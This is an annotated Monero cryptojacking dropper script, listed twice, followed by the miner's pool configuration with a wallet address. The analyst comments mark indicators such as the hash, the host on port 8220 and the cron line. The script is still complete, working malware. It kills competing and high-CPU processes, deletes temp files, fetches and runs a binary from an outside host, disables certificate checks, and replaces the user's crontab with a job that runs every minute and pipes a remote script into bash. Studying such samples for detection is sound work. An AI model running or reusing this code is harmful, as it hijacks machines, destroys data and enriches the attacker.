Payload for a Monero crypto miner: the dropper shell script (listed twice below), followed by the miner's JSON configuration.
#!/bin/bash | |
# Analyst annotation: comments only, every script line is left unchanged.
# The trailing "| |" on each line appears to be a table-extraction artefact of
# the page rather than part of the original script.
#
# Stage 1 - host preparation: make sure /var/tmp exists and is world-writable.
mkdir /var/tmp | |
chmod 777 /var/tmp | |
# Kills every process whose command line matches "getty"; genuine getty login
# processes match this pattern as well.
pkill -f getty | |
# Stage 2 - connection-based kills. Each pipeline takes the PID/program column
# of `netstat -antp` (field 7) for sockets that mention the listed remote
# address and state, strips the "/program" suffix and sends SIGKILL to the PID.
# Presumably these addresses belong to rival miners; the page does not say.
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
# Kills processes started from a dot-prefixed (hidden) file named like sshd.
pkill -f /usr/bin/.sshd | |
# Here the match is on address and port together, in any connection state.
netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
# Stage 3 - file cleanup: deletes anything named j* or java* in /tmp and
# /var/tmp. Legitimate files with such names in those directories go too.
rm -rf /var/tmp/j* | |
rm -rf /tmp/j* | |
rm -rf /var/tmp/java | |
rm -rf /tmp/java | |
rm -rf /var/tmp/java2 | |
rm -rf /tmp/java2 | |
rm -rf /var/tmp/java* | |
rm -rf /tmp/java* | |
# "sustse" is the file name this script uses for its own binary throughout.
chmod 777 /var/tmp/sustse | |
# Stage 4 - CPU-based kills: SIGKILL every process above 40% CPU whose ps line
# does not contain the word "sustse". Busy legitimate services are hit too, so
# unexplained SIGKILLs of high-load processes are a host-level symptom.
ps aux | grep -vw sustse | awk '{if($3>40.0) print $2}' | while read procid | |
do | |
kill -9 $procid | |
done | |
# Kills processes whose command line mentions /tmp/, and processes that
# reference wc.conf, wq.conf or wm.conf, except lines matching sustse or ppl.
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
# Stage 5 - choose the working directory (DIR) and check an existing binary.
DIR="/var/tmp" | |
if [ -a "/var/tmp/sustse" ] | |
then | |
if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ] | |
then | |
if [ -x "$(command -v md5sum)" ] | |
then | |
# Compares the file's MD5 with one hard-coded value (both case alternatives
# are the same hash). That value is a usable file indicator for this sample.
sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
# Hash mismatch: stop any running instance before the binary is replaced.
echo "sustse wrong" | |
pkill -f wc.conf | |
pkill -f sustse | |
sleep 4 | |
;; | |
esac | |
fi | |
echo "P OK" | |
else | |
# /var/tmp/sustse exists but is not a writable regular file: DIR becomes a
# path under a fresh mktemp directory instead.
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
else | |
if [ -d "/var/tmp" ] | |
then | |
DIR="/var/tmp" | |
fi | |
echo "P NOT EXISTS" | |
fi | |
# Same mktemp fallback when /var/tmp/sustse is a directory.
if [ -d "/var/tmp/sustse" ] | |
then | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
# Stage 6 - pick the download command. wget is tested last, so it is used
# when both /usr/bin/curl and /usr/bin/wget exist.
WGET="wget -O" | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -o"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget -O"; | |
fi | |
# Host and port the miner configuration is fetched from (see judge/judge2).
# Outbound HTTP to this host on port 8220 is a network indicator.
f2="www.tionhgjk.com:8220" | |
# downloadIfNeed: make sure $DIR/sustse exists and matches the hard-coded MD5,
# calling download() when it is missing or differs. Reads DIR and reassigns
# WGET. Without md5sum it calls download() unconditionally.
downloadIfNeed() | |
{ | |
if [ -x "$(command -v md5sum)" ] | |
then | |
if [ ! -f $DIR/sustse ]; then | |
echo "File not found!" | |
download | |
fi | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
sizeBefore=$(du $DIR/sustse) | |
# On a mismatch the downloader is switched to flags that turn off TLS
# certificate verification (curl -k / wget --no-check-certificate).
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -k -o "; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget --no-check-certificate -O "; | |
fi | |
# Disabled alternative source left in by the author.
#$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse | |
download | |
sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
# Writes a one-line before/after record to $DIR/var/tmp.txt, only when
# /usr/bin/curl is present. That file is a possible on-disk artefact.
if [ -s /usr/bin/curl ]; | |
then | |
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt | |
fi | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download | |
fi | |
} | |
# download: reuse the cached copy $DIR/sustse3 when its MD5 matches the
# hard-coded value, copying it over $DIR/sustse. Otherwise, or when md5sum is
# unavailable, fall through to download2() for a network fetch.
download() { | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse3 $DIR/sustse | |
;; | |
*) | |
echo "sustse wrong" | |
download2 | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download2 | |
fi | |
} | |
# download2: network fetch of the binary. Only when getconf reports a 64-bit
# LONG_BIT, it retrieves /tte2 from the host below over plain HTTP into
# $DIR/sustse. On an MD5 match the file is also cached as $DIR/sustse3.
# The URL and the sustse/sustse3 file names are indicators for this sample.
download2() { | |
if [ `getconf LONG_BIT` = "64" ] | |
then | |
$WGET $DIR/sustse http://www.tionhgjk.com:8220/tte2 | |
fi | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse $DIR/sustse3 | |
;; | |
*) | |
# A mismatch is only reported here; nothing is retried or removed.
echo "sustse wrong" | |
;; | |
esac | |
else | |
echo "No md5sum" | |
fi | |
} | |
# judge: connection-based "is it running?" check. The three addresses tested
# are the pool hosts listed in the JSON configuration further down this page.
# With no ESTABLISHED connection to any of them, the miner is (re)started.
judge() { | |
if [ ! "$(netstat -ant|grep '192.99.142.251\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ]; | |
then | |
# SIGKILL every process at or above 30% CPU before starting.
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid | |
do | |
kill -9 $procid | |
done | |
downloadIfNeed | |
# Creates an empty /var/tmp/123; nothing else in this script reads it.
touch /var/tmp/123 | |
pkill -f /var/tmp/java | |
pkill -f w.conf | |
chmod +x $DIR/sustse | |
# Fetches wt.conf from the f2 host (set at top level) and stores it as wc.conf.
$WGET $DIR/wc.conf http://$f2/wt.conf | |
# Starts the binary detached with all output discarded. The command line
# "sustse -c .../wc.conf" is what shows up in the process list.
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
# judge2: process-list "is it running?" check. If no process line contains
# both /var/tmp/sustse and wc.conf, it fetches the binary and configuration
# and starts the miner detached. Unlike judge(), it kills no other processes.
judge2() { | |
if [ ! "$(ps -fe|grep '/var/tmp/sustse'|grep 'wc.conf'|grep -v grep)" ]; | |
then | |
downloadIfNeed | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
# Dispatch: when `netstat -ant` shows no LISTEN/ESTABLISHED/TIME_WAIT lines at
# all, use the process-list check (judge2); otherwise use the connection
# check (judge).
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ]; | |
then | |
judge2 | |
else | |
judge | |
fi | |
# Persistence through the invoking user's crontab. If no entry mentions the
# download host, the whole crontab is deleted (crontab -r, which also removes
# the user's legitimate jobs) and a single every-minute entry is installed
# that fetches mr.sh from that host and pipes it to bash.
# For defenders: a "* * * * *" cron line piping a download into a shell, and
# minute-by-minute HTTP requests to port 8220, are the artefacts to look for.
if crontab -l | grep -q "www.tionhgjk.com:8220" | |
then | |
echo "Cron exists" | |
else | |
crontab -r | |
echo "Cron not found" | |
LDR="wget -q -O -" | |
if [ -s /usr/bin/curl ]; | |
then | |
LDR="curl"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
LDR="wget -q -O -"; | |
fi | |
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://www.tionhgjk.com:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab - | |
fi | |
# Final cleanup: removes files named jrm, kills processes whose command line
# contains one of three addresses, and deletes crontab lines that mention
# 185.222.210.59. Presumably these belong to a rival or older campaign; the
# page does not say.
rm -rf /var/tmp/jrm | |
rm -rf /tmp/jrm | |
pkill -f 185.222.210.59 | |
pkill -f 95.142.40.81 | |
pkill -f 192.99.142.232 | |
chmod 777 /var/tmp/sustse | |
crontab -l | sed '/185.222.210.59/d' | crontab - |
#!/bin/bash | |
# Analyst annotation: comments only, every script line is left unchanged.
# This listing repeats the script shown earlier on the page. The trailing
# "| |" on each line appears to be a table-extraction artefact.
#
# Host preparation: make sure /var/tmp exists and is world-writable.
mkdir /var/tmp | |
chmod 777 /var/tmp | |
# Matches genuine getty login processes as well.
pkill -f getty | |
# Connection-based kills: SIGKILL the owner (netstat field 7, "/program"
# suffix stripped) of any socket to the listed remote addresses. Presumably
# these are rival miners' endpoints; the page does not say.
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
pkill -f /usr/bin/.sshd | |
netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
# File cleanup: deletes anything named j* or java* in /tmp and /var/tmp.
rm -rf /var/tmp/j* | |
rm -rf /tmp/j* | |
rm -rf /var/tmp/java | |
rm -rf /tmp/java | |
rm -rf /var/tmp/java2 | |
rm -rf /tmp/java2 | |
rm -rf /var/tmp/java* | |
rm -rf /tmp/java* | |
chmod 777 /var/tmp/sustse | |
# CPU-based kills: every process above 40% CPU whose ps line lacks the word
# "sustse" is SIGKILLed, legitimate workloads included.
ps aux | grep -vw sustse | awk '{if($3>40.0) print $2}' | while read procid | |
do | |
kill -9 $procid | |
done | |
# Kills processes run from /tmp/ or referencing wc.conf, wq.conf or wm.conf,
# except lines matching sustse or ppl.
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
# Working-directory selection and integrity check of an existing binary.
DIR="/var/tmp" | |
if [ -a "/var/tmp/sustse" ] | |
then | |
if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ] | |
then | |
if [ -x "$(command -v md5sum)" ] | |
then | |
# The MD5 is compared with one hard-coded value, written twice in the
# pattern. That value is a usable file indicator for this sample.
sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
# Hash mismatch: stop running instances before the binary is replaced.
echo "sustse wrong" | |
pkill -f wc.conf | |
pkill -f sustse | |
sleep 4 | |
;; | |
esac | |
fi | |
echo "P OK" | |
else | |
# Not a writable regular file: DIR moves under a fresh mktemp directory.
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
else | |
if [ -d "/var/tmp" ] | |
then | |
DIR="/var/tmp" | |
fi | |
echo "P NOT EXISTS" | |
fi | |
# Same mktemp fallback when /var/tmp/sustse is a directory.
if [ -d "/var/tmp/sustse" ] | |
then | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
# Download-command selection. wget is tested last, so it is used when both
# /usr/bin/curl and /usr/bin/wget exist.
WGET="wget -O" | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -o"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget -O"; | |
fi | |
# Host and port the miner configuration is fetched from (used in judge and
# judge2). Outbound HTTP to this host on port 8220 is a network indicator.
f2="www.tionhgjk.com:8220" | |
# downloadIfNeed: make sure $DIR/sustse exists and matches the hard-coded MD5,
# calling download() when it is missing or differs. Reads DIR and reassigns
# WGET. Without md5sum it calls download() unconditionally.
downloadIfNeed() | |
{ | |
if [ -x "$(command -v md5sum)" ] | |
then | |
if [ ! -f $DIR/sustse ]; then | |
echo "File not found!" | |
download | |
fi | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
sizeBefore=$(du $DIR/sustse) | |
# The downloader is switched to flags that disable TLS certificate
# verification (curl -k / wget --no-check-certificate).
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -k -o "; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget --no-check-certificate -O "; | |
fi | |
# Disabled alternative source left in by the author.
#$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse | |
download | |
sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
# Before/after record written to $DIR/var/tmp.txt, only when
# /usr/bin/curl is present. That file is a possible on-disk artefact.
if [ -s /usr/bin/curl ]; | |
then | |
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt | |
fi | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download | |
fi | |
} | |
# download: reuse the cached copy $DIR/sustse3 when its MD5 matches the
# hard-coded value, copying it over $DIR/sustse. Otherwise, or when md5sum is
# unavailable, fall through to download2() for a network fetch.
download() { | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse3 $DIR/sustse | |
;; | |
*) | |
echo "sustse wrong" | |
download2 | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download2 | |
fi | |
} | |
# download2: network fetch of the binary. Only when getconf reports a 64-bit
# LONG_BIT, it retrieves /tte2 from the host below over plain HTTP into
# $DIR/sustse. On an MD5 match the file is also cached as $DIR/sustse3.
# The URL and the sustse/sustse3 file names are indicators for this sample.
download2() { | |
if [ `getconf LONG_BIT` = "64" ] | |
then | |
$WGET $DIR/sustse http://www.tionhgjk.com:8220/tte2 | |
fi | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse $DIR/sustse3 | |
;; | |
*) | |
# A mismatch is only reported here; nothing is retried or removed.
echo "sustse wrong" | |
;; | |
esac | |
else | |
echo "No md5sum" | |
fi | |
} | |
# judge: connection-based "is it running?" check. The three addresses tested
# are the pool hosts listed in the JSON configuration further down this page.
# With no ESTABLISHED connection to any of them, the miner is (re)started.
judge() { | |
if [ ! "$(netstat -ant|grep '192.99.142.251\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ]; | |
then | |
# SIGKILL every process at or above 30% CPU before starting.
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid | |
do | |
kill -9 $procid | |
done | |
downloadIfNeed | |
# Creates an empty /var/tmp/123; nothing else in this script reads it.
touch /var/tmp/123 | |
pkill -f /var/tmp/java | |
pkill -f w.conf | |
chmod +x $DIR/sustse | |
# Fetches wt.conf from the f2 host (set at top level) and stores it as wc.conf.
$WGET $DIR/wc.conf http://$f2/wt.conf | |
# Starts the binary detached with all output discarded. The command line
# "sustse -c .../wc.conf" is what shows up in the process list.
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
# judge2: process-list "is it running?" check. If no process line contains
# both /var/tmp/sustse and wc.conf, it fetches the binary and configuration
# and starts the miner detached. Unlike judge(), it kills no other processes.
judge2() { | |
if [ ! "$(ps -fe|grep '/var/tmp/sustse'|grep 'wc.conf'|grep -v grep)" ]; | |
then | |
downloadIfNeed | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
# Dispatch: when `netstat -ant` shows no LISTEN/ESTABLISHED/TIME_WAIT lines at
# all, use the process-list check (judge2); otherwise use the connection
# check (judge).
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ]; | |
then | |
judge2 | |
else | |
judge | |
fi | |
# Persistence through the invoking user's crontab. If no entry mentions the
# download host, the whole crontab is deleted (crontab -r, which also removes
# the user's legitimate jobs) and a single every-minute entry is installed
# that fetches mr.sh from that host and pipes it to bash.
# For defenders: a "* * * * *" cron line piping a download into a shell, and
# minute-by-minute HTTP requests to port 8220, are the artefacts to look for.
if crontab -l | grep -q "www.tionhgjk.com:8220" | |
then | |
echo "Cron exists" | |
else | |
crontab -r | |
echo "Cron not found" | |
LDR="wget -q -O -" | |
if [ -s /usr/bin/curl ]; | |
then | |
LDR="curl"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
LDR="wget -q -O -"; | |
fi | |
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://www.tionhgjk.com:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab - | |
fi | |
# Final cleanup: removes files named jrm, kills processes whose command line
# contains one of three addresses, and deletes crontab lines that mention
# 185.222.210.59. Presumably these belong to a rival or older campaign; the
# page does not say.
rm -rf /var/tmp/jrm | |
rm -rf /tmp/jrm | |
pkill -f 185.222.210.59 | |
pkill -f 95.142.40.81 | |
pkill -f 192.99.142.232 | |
chmod 777 /var/tmp/sustse | |
crontab -l | sed '/185.222.210.59/d' | crontab - |
{ | |
"algo": "cryptonight", | |
"api": { | |
"port": 0, | |
"access-token": null, | |
"id": null, | |
"worker-id": null, | |
"ipv6": false, | |
"restricted": true | |
}, | |
"asm": true, | |
"autosave": true, | |
"av": 0, | |
"background": true, | |
"colors": true, | |
"cpu-affinity": null, | |
"cpu-priority": 5, | |
"donate-level": 1, | |
"huge-pages": true, | |
"hw-aes": null, | |
"log-file": null, | |
"max-cpu-usage": 95, | |
"pools": [ | |
{ | |
"url": "192.99.142.251:80", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
}, | |
{ | |
"url": "192.99.142.249:3333", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
}, | |
{ | |
"url": "202.144.193.110:3333", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
} | |
], | |
"print-time": 60, | |
"retries": 5, | |
"retry-pause": 5, | |
"safe": false, | |
"threads": { | |
"cn": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
], | |
"cn-lite": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
], | |
"cn-heavy": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
] | |
}, | |
"algo-perf": { | |
"cn": 2.0, | |
"cn/2": 2.0, | |
"cn/msr": 2.0, | |
"cn-lite": 2.0, | |
"cn-heavy": 2.0 | |
}, | |
"calibrate-algo": false, | |
"calibrate-algo-time": 10, | |
"user-agent": null, | |
"syslog": false, | |
"watch": false | |
} |